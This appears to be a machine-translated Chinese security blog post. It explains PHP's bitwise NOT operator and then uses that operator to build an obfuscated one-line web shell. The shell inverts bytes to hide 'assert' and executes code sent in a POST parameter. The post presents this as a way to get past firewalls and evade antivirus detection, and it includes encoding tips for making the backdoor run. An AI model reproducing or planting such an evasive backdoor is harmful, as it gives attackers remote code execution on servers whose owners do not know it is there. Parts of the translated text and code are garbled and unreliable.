1 PHP ~ bitwise operator
PHP: bitwise operator-http://www.php.net/manual/zh/language.operators.bitwise.php
Some time ago, a foreigner on Twitter burst a funny thing, a string of suspected garbled strings can be accessed after the normal output of 1337, so there are the following research results.
~ $a not (bitwise inverse) Sets the bit of 0 in the $a to 1, and vice versa.
PHP's INI setting error_reporting uses a bitwise value, providing a real example of closing a bit. To display all errors except the hint level.
PHP.ini is used in this way: E_all & ~e_notice
The specific mode of operation is to obtain the value of E_all first: 00000000000000000111011111111111
Re-obtained E_notice value: 00000000000000000000000000001000
And then take it back: 11111111111111111111111111110111
Finally, bitwise AND and (&) are given a bit of (1) in two values: 00000000000000000111011111110111
2) Analysis and recurrence
This is the original code implementation effect at the time:
When you see this effect, the first thought is to bypass the firewall, such as the implementation of the back door, and then began to consider what kind of coding method?
Later, with the Li Pu Jun test found directly using echo ~ ' 1 ', and so will directly output the ' garbled ', side to read the PHP official ~ function explanation before it dawned.
Then we can start writing a sentence to try the effect:
? 1
2
3
4
$x =~ÿ¬¬º«;
$x ($_post[~¹¹ïïïï]);
?>
Here defines the $x variable for assert, and then the password for the FF0000 directly linked back door can be, because when the bit back out of the ' garbled ' after we take again back to normal value.
3 about coding and kill-free
When I reproduce this back door, I found that direct copy over the direct HTTP state 500, the source is the coding problem, above this ' garbled ' in fact, Western Europe (ISO-8859-15).
In the actual process we encountered multiple back doors unable to link the 500 error balance because of the encoding problem, if the default encoding is not recognized the encoding is saved as this can be (GBKUTF8 ...) cannot be used successfully)
AUTHOR:EVI1M0 [email:evi1m0#ff0000.cc]
From: Evil Red information Security organization [FF0000 team]